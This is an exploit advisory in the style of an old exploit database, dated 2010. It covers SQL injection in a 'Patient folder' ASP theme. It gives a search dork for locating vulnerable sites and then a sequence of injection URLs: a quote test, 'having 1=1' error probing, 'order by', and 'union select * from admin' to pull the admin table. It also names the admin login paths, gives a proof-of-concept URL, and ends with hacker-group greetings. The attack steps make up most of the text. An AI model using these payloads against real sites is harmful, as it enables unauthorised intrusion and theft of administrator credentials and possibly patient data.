============================================================
Patient folder (THEME ASP) Local SQL Injection Vulnerability
============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : v4-team.com , xp10.me                         0
1  [+] Support e-mail  : z3r0.s4.z3r0[at]gmail.com                     1
0                                                                      0
1                    ##########################################        1
0                    I'm Abu Saud member from Saudi Arabic Team        1
1                    ##########################################        0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Search:	"profil.asp?id=" OR "asp?id="
Author:		SA H4x0r
Contact:	ww0[at]hotmail.com
Data:           2010-05-31 
=====================================================================

Description:

Inject script asp to tell the script to take them infected .. 

=====================================================================

	                      --=[ Vuln C0de ]=-

                               [-] com/profil.asp?id
                               [-] xxx/xxxxxx.asp?id

-----------------------------------------------------------------------------------------

Directions: 

http://[Site].com/profil.asp?id=1' <<< To show us the site involved or not

http://[Site].com/profil.asp?id=1 having 1=1 << Here is a guide on the site downstream

Look: 

[Microsoft][ODBC Microsoft Access Driver] HAVING clause (1=1) without grouping or aggregation. 

okey ;) 

http://[Site].com/profil.asp?id=1 order by 1 

http://[Site].com/profil.asp?id=1 union select * from admin  

Control panel: http://[Site].com/admin "OR" http://[Site].com/login

-----------------------------------------------------------------------------------------

	                   -=[ P0C ]=-

	  http://127.0.0.1/profile/profil.asp?id=[SQL ASP]

	  http://127.0.0.1/.asp?id=[SQL ASP]

=========================| -=[ E0F ]=- |=========================

Gr33t'z; Dmar Skood - VirUs_Ra3ch - Mr_QlQ - v4 Team - XP10_HackEr

# [2010-05-31]